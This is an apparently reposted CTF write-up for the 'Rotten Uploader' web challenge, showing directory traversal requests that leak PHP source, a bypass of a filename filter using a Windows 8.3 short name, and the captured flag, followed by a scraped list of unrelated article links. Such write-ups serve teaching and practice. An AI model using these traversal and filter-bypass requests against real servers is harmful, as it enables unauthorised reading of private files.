Tokyo Westerns/MMA CTF - Rotten Uploader
来源:互联网 发布:小米6 移动4g网络差 编辑:程序博客网 时间:2024/05/08 07:01
http://zubcic.re/blog/tokyo-westerns-mma-ctf-rotten-uploader
The download links had the following format: download.php?f=test.cpp
The script was vulnerable to directory traversal, allowing us to get the source of the index page by requesting download.php?f=../index.php
which gave us the following source code:
<?php/** * */include('file_list.php');?><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0 Level 2//EN"><html> <head> <title>Uploader</title> </head> <body> <h1>Simple Uploader</h1> <p>There are no upload features.</p> <h3>Files</h3> <table width="100%" border="1"> <tr> <th>#</th> <th>Filename</th> <th>Size</th> <th>Link</th> </tr> <?php foreach($files as $file): ?> <?php if($file[0]) continue; // visible flag ?> <tr> <td><?= $file[1]; ?></td> <td><?= $file[2]; ?></td> <td><?= $file[3]; ?> bytes</td> <td><a href="download.php?f=<?= $file[4]; ?>">Download</a></td> </tr> <?php endforeach;?> </table> </body></html>
And download.php via download.php?f=../download.php
:
<?phpheader("Content-Type: application/octet-stream");if(stripos($_GET['f'], 'file_list') !== FALSE) die();readfile('uploads/' . $_GET['f']); // safe_dir is enabled. ?>
Clearly the goal is getting the contents of file_list.php, but the download script checks if requested filename contains 'file_list'. After some thinking and realizing the server is running Windows, we decided to try converting the filename to 8.3 / short filename. We requesteddownload.php?f=../file_l~1.php
and got file_list.php's source:
<?php$files = [ [FALSE, 1, 'test.cpp', 1135, 'test.cpp'], [FALSE, 2, 'test.c', 74, 'test.c'], [TRUE, 3, 'flag_c82e41f5bb7c8d4b947c9586444578ade88fe0d7', 35, 'flag_c82e41f5bb7c8d4b947c9586444578ade88fe0d7'], [FALSE, 4, 'test.rb', 1446, 'test.rb'],];
Having the flag's filename, we downloaded it by requesting download.php?f=flag_c82e41f5bb7c8d4b947c9586444578ade88fe0d7
and received the flag: TWCTF{Hotto_Smile}
- Tokyo Westerns/MMA CTF - Rotten Uploader
- TWCTF 2016 (Tokyo Westerns CTF ) WEB WriteUp
- Rotten Ropes
- MMA-master_pos_wait()
- CTF
- ctf
- ctf
- ctf
- CTF
- zoj 2488 Rotten Ropes
- ZOJ 2488 Rotten Ropes
- ZOJ-2488 Rotten Ropes
- 2291 Rotten Ropes
- KISSY uploader
- Web Uploader
- Web Uploader
- weui upLoader
- WEUI.Uploader
- How To Test your Firewall Configuration with Nmap and Tcpdump
- 【技术分享】手把手教你如何构造office漏洞POC(第一期)
- 【原创技术分享】Exponent-cms任意文件上传漏洞分析 (cve-2016-7095)
- Summary Ranges
- How I was able to read Uber logs and internal emails.
- Tokyo Westerns/MMA CTF - Rotten Uploader
- The Top 10 Most Popular Security Projects on GitHub Read more: http://news.softpedia.com/news/the-t
- 【COCOS2DX-BOX2D游戏开发之三】 读取tiledmap的tmx阻挡(转)
- 导教班,我的职业续航加油站
- SparkEnv
- Theano 初探(一)
- ubuntu16安装jdk1.8
- python过滤None
- 國罡上을 國岡上으로 고쳐쓰는者는 뭐하는者일꼬?